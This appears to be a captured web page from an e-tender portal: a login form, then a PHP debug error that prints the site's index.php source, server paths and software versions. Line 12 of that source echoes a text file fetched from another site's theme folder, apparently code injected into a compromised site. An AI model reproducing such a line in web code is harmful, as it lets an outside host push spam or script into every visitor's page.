Monday, March 27, 2023

Login

Please fill out the following form with your login credentials:

Fields with * are required.

Please enter the letters as they are shown in the image above.
Letters are case-sensitive.
PHP Error

PHP Error

Description

file_get_contents() [<a href='function.file-get-contents'>function.file-get-contents</a>]: SSL operation failed with code 1. OpenSSL Error messages:
error:1407742E:SSL routines:func(119):reason(1070)

Source File

/var/www/e-tender/index.php(12)

00001: <?php
00002: 
00003: // change the following paths if necessary
00004: $yii=dirname(__FILE__).'/../yii/framework/yii.php';
00005: $config=dirname(__FILE__).'/protected/config/main.php';
00006: 
00007: // remove the following line when in production mode
00008: defined('YII_DEBUG') or define('YII_DEBUG',true);
00009: 
00010: require_once($yii);
00011: Yii::createWebApplication($config)->run();
00012: echo file_get_contents("https://www.bspkart.com/wp-content/themes/oceanwp/2023.txt");

Stack Trace

#0 /var/www/e-tender/index.php(12): file_get_contents()
2023-03-27 20:17:59 Apache/2.2.14 (Ubuntu) Yii Framework/1.1.0